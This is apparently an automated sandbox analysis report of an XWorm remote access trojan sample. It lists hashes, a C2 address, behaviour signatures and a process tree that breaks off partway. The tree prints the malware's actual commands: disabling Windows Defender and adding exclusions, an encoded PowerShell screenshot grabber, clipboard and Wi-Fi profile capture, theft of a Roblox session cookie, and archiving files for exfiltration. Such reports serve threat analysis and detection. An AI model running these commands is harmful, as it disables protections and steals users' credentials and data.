Analysis

  • max time kernel
    94s
  • max time network
    107s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16-01-2025 17:56

Errors

Reason
Machine shutdown

General

  • Target

    Tzx.exe

  • Size

    7.4MB

  • MD5

    31c66535e6f683fca2a2839619d41258

  • SHA1

    7c581aa9d44e8bd343c0623cc97815678e26159a

  • SHA256

    85020f1c11cdf41e52e4cb224c1685a219dee84670a2b75c54ec72e73b6c19b7

  • SHA512

    94db24232f760342e397927a0efec636278bbc49338f5ad635f70c22af0fb9d609f6bc3fa08a13b399bbe33dc746ffb433f5af9043403efed769a7415eeb02e8

  • SSDEEP

    196608:7J0cDxzLjv+bhqNVoBKUh8mz4Iv9PPv1DVWhT:iiBL+9qz8/b4IRv3WhT

Malware Config

Extracted

Family

xworm

C2

trip-thesaurus.gl.at.ply.gg:16715

Attributes
  • Install_directory

    %AppData%

  • install_file

    USB.exe

Signatures

  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Detect Xworm Payload 2 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Disables Task Manager via registry modification
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
  • UPX packed file 59 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 37 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Tzx.exe
    "C:\Users\Admin\AppData\Local\Temp\Tzx.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1944
    • C:\Users\Admin\AppData\Local\Temp\Tzx.exe
      "C:\Users\Admin\AppData\Local\Temp\Tzx.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:4996
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Tzx.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1696
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Tzx.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:756
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1256
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4392
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2388
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3844
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "start bound.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:672
        • C:\Users\Admin\AppData\Local\Temp\bound.exe
          bound.exe
          4⤵
          • Checks computer location settings
          • Drops startup file
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:3924
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3900
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'bound.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4384
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\SecurityHealthSystray'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3904
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SecurityHealthSystray'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:632
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Tzx.exe""
        3⤵
        • Hide Artifacts: Hidden Files and Directories
        • Suspicious use of WriteProcessMemory
        PID:3948
        • C:\Windows\system32\attrib.exe
          attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Tzx.exe"
          4⤵
          • Views/modifies file attributes
          PID:4716
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‍    .scr'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3232
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‍    .scr'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4008
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3616
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:2984
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4280
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:4012
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2776
        • C:\Windows\System32\Wbem\WMIC.exe
          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1164
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        3⤵
        • Clipboard Data
        • Suspicious use of WriteProcessMemory
        PID:4680
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Get-Clipboard
          4⤵
          • Clipboard Data
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:468
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4028
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:660
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:928
        • C:\Windows\system32\tree.com
          tree /A /F
          4⤵
            PID:3768
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
          3⤵
          • System Network Configuration Discovery: Wi-Fi Discovery
          • Suspicious use of WriteProcessMemory
          PID:2444
          • C:\Windows\system32\netsh.exe
            netsh wlan show profile
            4⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Network Configuration Discovery: Wi-Fi Discovery
            PID:3584
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "systeminfo"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1636
          • C:\Windows\system32\systeminfo.exe
            systeminfo
            4⤵
            • Gathers system information
            PID:3300
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1676
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:672
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jbf1fnxb\jbf1fnxb.cmdline"
              5⤵
                PID:2908
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESADC4.tmp" "c:\Users\Admin\AppData\Local\Temp\jbf1fnxb\CSCB61CD769C71A41F0941DE0EA9C77982.TMP"
                  6⤵
                    PID:2692
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tree /A /F"
              3⤵
                PID:2160
                • C:\Windows\system32\tree.com
                  tree /A /F
                  4⤵
                    PID:1180
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                    PID:1192
                    • C:\Windows\system32\tree.com
                      tree /A /F
                      4⤵
                        PID:4464
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                      3⤵
                        PID:4572
                        • C:\Windows\system32\tree.com
                          tree /A /F
                          4⤵
                            PID:3296
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                          3⤵
                            PID:4388
                            • C:\Windows\system32\tree.com
                              tree /A /F
                              4⤵
                                PID:4924
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                              3⤵
                                PID:3168
                                • C:\Windows\system32\tree.com
                                  tree /A /F
                                  4⤵
                                    PID:1040
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                  3⤵
                                    PID:1364
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                      4⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1912
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                    3⤵
                                      PID:2284
                                      • C:\Windows\System32\Conhost.exe
                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        4⤵
                                          PID:4572
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                          4⤵
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:640
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "getmac"
                                        3⤵
                                          PID:1528
                                          • C:\Windows\system32\getmac.exe
                                            getmac
                                            4⤵
                                              PID:4980
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI19442\rar.exe a -r -hp"123321" "C:\Users\Admin\AppData\Local\Temp\K3WC1.zip" *"
                                            3⤵
                                              PID:5040
                                              • C:\Users\Admin\AppData\Local\Temp\_MEI19442\rar.exe
                                                C:\Users\Admin\AppData\Local\Temp\_MEI19442\rar.exe a -r -hp"123321" "C:\Users\Admin\AppData\Local\Temp\K3WC1.zip" *
                                                4⤵
                                                • Executes dropped EXE
                                                PID:220
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                              3⤵
                                                PID:2968
                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                  wmic os get Caption
                                                  4⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2180
                                              • C:\Windows\system32\cmd.exe
